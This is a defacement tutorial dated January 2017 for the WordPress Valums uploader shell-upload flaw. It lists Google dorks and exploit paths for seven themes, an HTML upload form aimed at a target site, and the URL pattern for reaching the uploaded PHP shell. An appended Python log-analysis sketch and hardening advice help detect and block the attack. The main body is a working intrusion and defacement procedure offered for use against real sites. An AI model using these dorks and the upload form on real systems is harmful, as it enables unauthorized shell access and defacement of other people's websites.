Defacement with the WordPress Valums Uploader Shell Upload Exploit

Author : Unknown





Tutorial on defacement using the WordPress Valums Uploader shell upload exploit.
This exploit takes advantage of a bug in the Valums uploader bundled with the themes.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


To use it, search Google with the dorks above.

A vulnerable site looks like this: it shows the text {"error":"No files were uploaded.",



Then create a CSRF form in Notepad and save it with an .html extension:


<form enctype="multipart/form-data" action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
  <input type="jpg" name="url" value="./" /><br />
  Please choose a file: <input name="qqfile" type="file" /><br />
  <input type="submit" value="upload" />
</form>

If you don't feel like making one, you can use this one: Click here

Any CSRF form will work. Here is an example of a site where the file was uploaded successfully.




Shell access path: /wp-content/uploads/year/month/shellname.php
example: target.com/wp-content/uploads/2016/12/nueenggak.php
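
For defenders, the request sequence this tutorial describes (a POST to a theme's valums_uploader/php.php followed by a PHP file fetched from /wp-content/uploads/) can be flagged in web server access logs. The Python sketch below is an added example, not part of the original post; the combined log layout, the sample lines, and the function and finding names are assumptions constructed for illustration.

```python
import re

# Constructed sample access log (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2017:10:01:02 +0000] "GET /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2017:10:02:10 +0000] "POST /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2017:10:02:30 +0000] "GET /wp-content/uploads/2017/01/example.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2017:10:03:00 +0000] "GET /wp-content/uploads/2017/01/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2017:10:04:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Assumed log layout: client ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# The uploader endpoint the page names, under any theme directory.
UPLOADER_RE = re.compile(r"/wp-content/themes/[^/]+/.*valums_uploader/php\.php", re.I)
# Any PHP-like file requested from the uploads tree.
UPLOADS_PHP_RE = re.compile(r"/wp-content/uploads/.*\.ph(p\d?|tml)(\?|$)", re.I)


def analyze(log_text):
    """Return (kind, client, path, status) findings in log order."""
    findings = []
    uploaders = set()  # clients that POSTed to the uploader successfully
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, path, status = m[1], m[2].upper(), m[3], int(m[4])
        if UPLOADER_RE.search(path):
            if method == "POST" and status < 400:
                uploaders.add(client)
                findings.append(("upload", client, path, status))
            else:
                findings.append(("probe", client, path, status))
        elif UPLOADS_PHP_RE.search(path) and status < 400:
            kind = "shell-access" if client in uploaders else "php-in-uploads"
            findings.append((kind, client, path, status))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Any PHP request served from the uploads directory deserves review on its own. Disabling PHP execution in that directory and removing the bundled uploader script from the theme closes the path.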


Hope this is useful. Thank you. See you in the next tutorial.



Posted On : Thursday, 05 January 2017